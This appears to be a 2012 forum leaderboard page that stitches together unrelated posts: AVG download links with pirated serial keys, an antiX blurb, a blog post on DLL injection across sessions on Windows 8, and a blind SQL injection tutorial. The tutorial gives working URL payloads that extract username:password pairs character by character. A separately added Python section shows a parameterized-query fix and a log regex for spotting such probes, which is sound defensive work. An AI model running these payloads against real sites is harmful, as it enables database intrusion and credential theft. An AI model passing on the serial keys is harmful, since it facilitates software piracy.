
Leaderboard

Popular Content

Showing content with the highest reputation on 09/07/12 in all areas

  1. Download: AVG Internet Security 2013 32-bit Trial
     http://aa-download.avg.com/filedir/inst/avg_isct_x86_all_2013_2667a5738.exe
     Download: AVG Internet Security 2013 64-bit Trial
     http://aa-download.avg.com/filedir/inst/avg_isct_x64_all_2013_2667a5738.exe
     serials:
     8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
     8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
     8MEH-RGM33-K474L-6FGRR-8QEFN-UEMBR-ACED
     64-bit:
     8MEH-R6BFE-HWUHF-DPNDA-VFUWX-2EMBR-ACED
     8MEH-RXYFD-JUV72-8922R-FTDO8-QEMBR-ACED
     8MEH-RFR8J-PTS8Q-92ATA-ORC6Q-JEMBR-ACED
     8MEH-RS47Y-82HT8-GONVA-BCCCZ-DEMBR-ACED
     source: softexia.com
     edit // reupload! it works
    1 point
  2. antiX is a fast, lightweight and easy to install linux live CD distribution based on Debian Testing and MEPIS for Intel-AMD x86 compatible systems.
     download: Download antiX-Linux from SourceForge.net (731.9 MB)
    1 point
  3. [h=2]DLL Injection and Windows 8[/h]
     By Nagareshwar Talekar on Sep 7 2012

     Recently, while working on the new version of RemoteDLL, I discovered interesting changes around DLL injection on Windows 8. Before I actually talk about the new changes, here is a little background story.

     CreateRemoteThread is the most common method used for DLL injection. It used to work flawlessly till Windows XP. However, since Vista it changed its colors; mainly, it could no longer inject a DLL across sessions. This was attributed to the new 'Session Separation' feature introduced in Vista. To beat that limitation, we discovered a new undocumented method, NTCreateThread, which could inject a DLL across session boundaries on Vista/Win7.

     Now, while testing RemoteDLL on Windows 8, I tried (halfheartedly) injecting a DLL into a process running in Session 0. And to my utter surprise it worked just like magic in the old days. I tried again to make sure that I was not dreaming. So it looks like M$ has put things back in order.

     The question arises whether the CreateRemoteThread changes in Vista were done intentionally or accidentally, because we could still use NTCreateThread with little risk. Quick analysis points us in the other direction. CreateRemoteThread actually calls NTCreateThread somewhere down the layer. Maybe some extra checking code that was added in Vista actually caused CreateRemoteThread to exit. So it is possible that this extra code was for something else but it adversely blocked injection across sessions. Now Microsoft may have realized the problem and must have fixed it to work normally. On the other hand, CreateRemoteThread has legitimate uses and certainly some of its big customers may have made noise.

     To conclude, CreateRemoteThread now works well on Windows 8 across sessions (tested with the consumer edition). However, we still have to rely on NTCreateThread on Vista/Win7 for injection beyond session boundaries.

     Another notable change that I have observed is w.r.t. the Reference Count or Load Count for DLLs. A few years back, we wrote a research article, 'The covert way to find the Reference Count of DLL', explaining the hidden/undocumented Load Count field in the LDR_MODULE structure.

     typedef struct _LDR_MODULE {
         LIST_ENTRY InLoadOrderModuleList;
         LIST_ENTRY InMemoryOrderModuleList;
         LIST_ENTRY InInitializationOrderModuleList;
         PVOID BaseAddress;
         PVOID EntryPoint;
         ULONG SizeOfImage;
         UNICODE_STRING FullDllName;
         UNICODE_STRING BaseDllName;
         ULONG Flags;
         USHORT LoadCount;
         USHORT TlsIndex;
         LIST_ENTRY HashTableEntry;
         ULONG TimeDateStamp;
     } LDR_MODULE, *PLDR_MODULE;

     The PEB within each process stores information on all loaded DLLs in a linked list. Each DLL in this list is represented by an LDR_MODULE structure. One of the important but undocumented fields here is 'LoadCount' (the reference count of the DLL). This 'Load Count' plays an important role in deciding when the DLL has to be completely unloaded from the process. It is also useful in removing an injected DLL from a running process. Even our tools, RemoteDLL and SpyDLLRemover, use it while removing malware DLLs from a process.

     Here is the screenshot of RemoteDLL showing the Load Count for all DLLs in the selected process. As you see, LoadCount for static DLLs is set to -1 as usual, but for dynamically loaded DLLs it is set to 6. So where the hell has it gone? It has to be somewhere, as every process needs it. It is possible that the LDR_MODULE structure may have changed, or some of its fields may have been altered, or it has been moved somewhere else altogether. We have to dig further.

     This is just the tip of the iceberg; more reversing will reveal the real truths. And as I discover more, I will put it here. Meanwhile, if you find any interesting things around it, do share!

     Source: DLL Injection and Windows 8 | SecurityXploded Blog
    1 point
  4. A new concept. or
    1 point
  5. Blind SQLi Injection
     .Slacker, 30 August 2012

     Let's take as an example:
     http://www.site.com/news.php?id=5
     http://www.site.com/news.php?id=5 and 1=1 <= where 1=1 is true
     http://www.site.com/news.php?id=5 and 1=2 <= where 1=2 is false

     1. MySQL
     For blind we will use substring.
     http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
     Replace 4 with 5 if the query is true.
     http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

     2. Subselect
     When that doesn't work we will use a subselect.
     http://www.site.com/news.php?id=5 and (select 1)=1
     Now we will see whether we have access to mysql.user
     http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
     If the page loads normally, we have access to mysql.user

     3. Checking table and column names
     http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1
     (with limit 0,1 the query returns one row of data because of the subselect). If the page loads normally, with no missing content, it exists. If we get FALSE, an article is missing; we just change the table name until we guess it. Let's say the table with users is called users. Now we need the column name.
     http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
     If the page loads normally, it means the column name is Password. We have a column with the password.

     4. Extracting data from the database
     If we have found the users table and the columns, password and username, we will extract the characters from the list.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
     We convert character 1 to its ASCII value ( ASCII() ). We will try to reach FALSE.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
     We reached TRUE and we have to keep incrementing.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
     We have TRUE again.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
     Now we have FALSE. The first character of USERNAME is char(99). Converting from ASCII: char(99) is written 'c'.
     Let's check the second character:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
     We changed ,1,1 to ,2,1 to get the second character. Now we go back to character 1:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
     The page should load normally, so it is TRUE.
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
     It is false and we lower the number:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
     It is true and we raise the number:
     http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
     False. So the second character is char(105), which is 'i', and we have 'ci'; we keep incrementing to the end, and when >0 returns false (FALSE) we know we have reached the end.
     I hope this tutorial helped
    -1 points
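The defender's view of the oracle the tutorial above depends on, added here as an example that is not part of .Slacker's post: a constructed sqlite3 stand-in for the news table behind news.php?id=5 shows why a concatenated query answers the 'and 1=1' / 'and 1=2' probes with different responses while a validated, parameterized query does not, and a constructed log rule flags the tutorial's probe syntax in URL-decoded request lines. The table contents, log lines and regex are assumptions, not anything from the page.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed stand-in for the news table behind the tutorial's news.php?id=5.
ROWS = [(5, "Fifth article"), (6, "Sixth article")]
# Constructed access-log lines that carry the tutorial's own probe strings.
LOG = [
    '10.0.0.7 - - [30/Aug/2012:10:01:02] "GET /news.php?id=5 HTTP/1.1" 200',
    '10.0.0.7 - - [30/Aug/2012:10:01:05] "GET /news.php?id=5%20and%201=2 HTTP/1.1" 200',
    '10.0.0.7 - - [30/Aug/2012:10:01:09] "GET /news.php?id=5%20and%20ascii(substring('
    '(SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200',
]

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", ROWS)
    return con

def fetch_vulnerable(con, id_param):
    """String concatenation: everything after the number is parsed as SQL, so
    'and 1=1' keeps the row and 'and 1=2' drops it. That difference in the
    response is the oracle the whole tutorial is built on."""
    return [row[0] for row in con.execute("SELECT title FROM news WHERE id=" + id_param)]

def fetch_parameterized(con, id_param):
    """Hardened form: accept only digits, then bind the value, so a probe string
    can never become part of the statement and the oracle disappears."""
    if not re.fullmatch(r"\d+", id_param):
        return []  # a malformed id is simply 'no such article'
    return [row[0] for row in con.execute("SELECT title FROM news WHERE id=?", (int(id_param),))]

# Constructed detection rule derived from the tutorial's probe syntax; a triage aid, not a full WAF.
PROBE_RE = re.compile(
    r"\band\s+1\s*=\s*[12]\b"           # boolean probes: and 1=1 / and 1=2
    r"|\bascii\s*\(\s*substring\s*\("   # per-character extraction
    r"|\bselect\s+1\s+from\b",          # table-existence subselect
    re.IGNORECASE,
)

def flag_requests(log_lines):
    """Return the log lines whose URL-decoded text matches a blind-SQLi probe."""
    return [line for line in log_lines if PROBE_RE.search(unquote_plus(line))]

if __name__ == "__main__":
    db = make_db()
    print(fetch_vulnerable(db, "5 and 1=1"), fetch_vulnerable(db, "5 and 1=2"), fetch_parameterized(db, "5 and 1=1"))
    print(flag_requests(LOG))
```

The regex is deliberately narrow; real traffic needs decoding of nested encodings and tuning against your own application's legitimate query strings.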